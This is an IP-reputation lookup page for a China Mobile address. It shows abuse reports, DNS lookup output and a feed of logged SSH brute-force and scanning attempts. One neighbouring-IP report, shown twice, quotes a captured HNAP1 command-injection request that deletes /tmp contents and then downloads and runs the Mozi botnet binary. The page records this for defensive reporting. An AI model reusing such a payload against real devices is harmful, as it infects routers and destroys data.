111.42.67.49 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): China Mobile Communications Corporation

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackbotsspam	Fail2Ban Ban Triggered	2020-03-28 16:26:23

相同子网IP讨论:

IP	类型	评论内容	时间
111.42.67.31	attackspam	Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]	2020-04-14 23:25:30
111.42.67.77	attackspam	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 2020-04-06 12:23:14
111.42.67.72	attackbotsspam	suspicious action Thu, 27 Feb 2020 11:22:32 -0300	2020-02-28 03:23:14

类型

评论内容

时间

111.42.67.31

attackspam

Unauthorized connection attempt detected from IP address 111.42.67.31 to port 2323 [T]

2020-04-14 23:25:30

111.42.67.77

attackspam

POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://111.42.67.77:38257/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
2020-04-06 12:23:14

111.42.67.72

attackbotsspam

suspicious action Thu, 27 Feb 2020 11:22:32 -0300

2020-02-28 03:23:14

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 111.42.67.49
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 9406
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;111.42.67.49.			IN	A

;; AUTHORITY SECTION:
.			227	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020032801 1800 900 604800 86400

;; Query time: 105 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 28 16:26:12 CST 2020
;; MSG SIZE  rcvd: 116

HOST信息:

Host 49.67.42.111.in-addr.arpa not found: 2(SERVFAIL)

NSLOOKUP信息:

;; Got SERVFAIL reply from 100.100.2.138, trying next server
;; Got SERVFAIL reply from 100.100.2.138, trying next server
Server:		100.100.2.136
Address:	100.100.2.136#53

** server can't find 49.67.42.111.in-addr.arpa: SERVFAIL

最新评论:

IP	类型	评论内容	时间
106.13.232.193	attackbotsspam	SSH authentication failure x 6 reported by Fail2Ban ...	2020-08-17 03:13:26
208.109.12.104	attackbots	Aug 16 17:10:07 ns382633 sshd\[16382\]: Invalid user yjq from 208.109.12.104 port 45388 Aug 16 17:10:07 ns382633 sshd\[16382\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=208.109.12.104 Aug 16 17:10:09 ns382633 sshd\[16382\]: Failed password for invalid user yjq from 208.109.12.104 port 45388 ssh2 Aug 16 17:20:33 ns382633 sshd\[18663\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=208.109.12.104 user=root Aug 16 17:20:36 ns382633 sshd\[18663\]: Failed password for root from 208.109.12.104 port 50200 ssh2	2020-08-17 03:00:25
81.68.123.65	attack	Invalid user demo from 81.68.123.65 port 39490	2020-08-17 03:11:01
106.13.227.104	attackbotsspam	Aug 16 19:24:39 rotator sshd\[2261\]: Invalid user lynx from 106.13.227.104Aug 16 19:24:41 rotator sshd\[2261\]: Failed password for invalid user lynx from 106.13.227.104 port 37342 ssh2Aug 16 19:26:32 rotator sshd\[3063\]: Invalid user user from 106.13.227.104Aug 16 19:26:34 rotator sshd\[3063\]: Failed password for invalid user user from 106.13.227.104 port 57260 ssh2Aug 16 19:28:18 rotator sshd\[3125\]: Invalid user emmanuel from 106.13.227.104Aug 16 19:28:20 rotator sshd\[3125\]: Failed password for invalid user emmanuel from 106.13.227.104 port 48936 ssh2 ...	2020-08-17 03:13:42
125.71.216.50	attack	Failed password for invalid user ftptest from 125.71.216.50 port 43132 ssh2	2020-08-17 03:03:30
112.85.42.180	attack	Aug 16 20:54:23 ns382633 sshd\[28825\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=112.85.42.180 user=root Aug 16 20:54:25 ns382633 sshd\[28825\]: Failed password for root from 112.85.42.180 port 6453 ssh2 Aug 16 20:54:29 ns382633 sshd\[28825\]: Failed password for root from 112.85.42.180 port 6453 ssh2 Aug 16 20:54:32 ns382633 sshd\[28825\]: Failed password for root from 112.85.42.180 port 6453 ssh2 Aug 16 20:54:36 ns382633 sshd\[28825\]: Failed password for root from 112.85.42.180 port 6453 ssh2	2020-08-17 03:12:56
218.92.0.251	attackspam	Aug 16 21:17:18 minden010 sshd[31464]: Failed password for root from 218.92.0.251 port 44196 ssh2 Aug 16 21:17:21 minden010 sshd[31464]: Failed password for root from 218.92.0.251 port 44196 ssh2 Aug 16 21:17:30 minden010 sshd[31464]: Failed password for root from 218.92.0.251 port 44196 ssh2 Aug 16 21:17:30 minden010 sshd[31464]: error: maximum authentication attempts exceeded for root from 218.92.0.251 port 44196 ssh2 [preauth] ...	2020-08-17 03:19:41
14.136.245.194	attackbots	Unauthorized SSH login attempts	2020-08-17 02:43:17
192.35.168.220	attackspambots	Unauthorized connection attempt detected from IP address 192.35.168.220 to port 8102 [T]	2020-08-17 02:44:46
35.198.225.191	attackspam	2020-08-16T07:09:32.615670srv.ecualinux.com sshd[9902]: Invalid user hgrepo from 35.198.225.191 port 58314 2020-08-16T07:09:32.620023srv.ecualinux.com sshd[9902]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=191.225.198.35.bc.googleusercontent.com 2020-08-16T07:09:32.615670srv.ecualinux.com sshd[9902]: Invalid user hgrepo from 35.198.225.191 port 58314 2020-08-16T07:09:34.485506srv.ecualinux.com sshd[9902]: Failed password for invalid user hgrepo from 35.198.225.191 port 58314 ssh2 2020-08-16T07:13:25.866984srv.ecualinux.com sshd[10236]: Invalid user sun from 35.198.225.191 port 34400 2020-08-16T07:13:25.870776srv.ecualinux.com sshd[10236]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=191.225.198.35.bc.googleusercontent.com 2020-08-16T07:13:25.866984srv.ecualinux.com sshd[10236]: Invalid user sun from 35.198.225.191 port 34400 2020-08-16T07:13:27.726074srv.ecualinux.com sshd[10236]: Fai........ ------------------------------	2020-08-17 02:58:33
193.169.253.27	attackspambots	Aug 16 20:13:15 srv01 postfix/smtpd\[31914\]: warning: unknown\[193.169.253.27\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 16 20:14:00 srv01 postfix/smtpd\[16378\]: warning: unknown\[193.169.253.27\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 16 20:14:32 srv01 postfix/smtpd\[32165\]: warning: unknown\[193.169.253.27\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 16 20:18:39 srv01 postfix/smtpd\[32612\]: warning: unknown\[193.169.253.27\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 Aug 16 20:21:21 srv01 postfix/smtpd\[31851\]: warning: unknown\[193.169.253.27\]: SASL LOGIN authentication failed: UGFzc3dvcmQ6 ...	2020-08-17 02:43:40
104.248.244.119	attack	2020-08-16T14:20:47.284227shield sshd\[2136\]: Invalid user ubuntu from 104.248.244.119 port 45384 2020-08-16T14:20:47.293006shield sshd\[2136\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.244.119 2020-08-16T14:20:48.902844shield sshd\[2136\]: Failed password for invalid user ubuntu from 104.248.244.119 port 45384 ssh2 2020-08-16T14:23:56.500572shield sshd\[2553\]: Invalid user yr from 104.248.244.119 port 40990 2020-08-16T14:23:56.510167shield sshd\[2553\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.244.119	2020-08-17 03:15:07
124.156.114.53	attackspam	Failed password for invalid user joseph from 124.156.114.53 port 52216 ssh2	2020-08-17 03:16:45
156.96.46.8	attackbots	[2020-08-16 08:15:40] NOTICE[1185][C-00002c25] chan_sip.c: Call from '' (156.96.46.8:51265) to extension '01901146213724602' rejected because extension not found in context 'public'. [2020-08-16 08:15:40] SECURITY[1203] res_security_log.c: SecurityEvent="FailedACL",EventTV="2020-08-16T08:15:40.423-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="01901146213724602",SessionID="0x7f10c4086ce8",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/156.96.46.8/51265",ACLName="no_extension_match" [2020-08-16 08:20:51] NOTICE[1185][C-00002c2b] chan_sip.c: Call from '' (156.96.46.8:59095) to extension '01801146213724602' rejected because extension not found in context 'public'. [2020-08-16 08:20:51] SECURITY[1203] res_security_log.c: SecurityEvent="FailedACL",EventTV="2020-08-16T08:20:51.380-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="01801146213724602",SessionID="0x7f10c4086ce8",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UD ...	2020-08-17 03:05:19
160.16.147.188	attack	WordPress login Brute force / Web App Attack on client site.	2020-08-17 02:45:35

最近上报的IP列表

171.110.117.223	190.103.181.209	39.89.150.34	103.57.222.223
1.1.245.72	183.88.2.169	180.244.233.221	95.178.216.37
52.80.191.249	171.249.41.135	187.110.235.70	162.243.133.15
74.131.51.86	202.82.149.243	54.43.247.135	156.231.38.66
106.116.118.111	14.18.92.6	144.91.118.152	142.44.247.115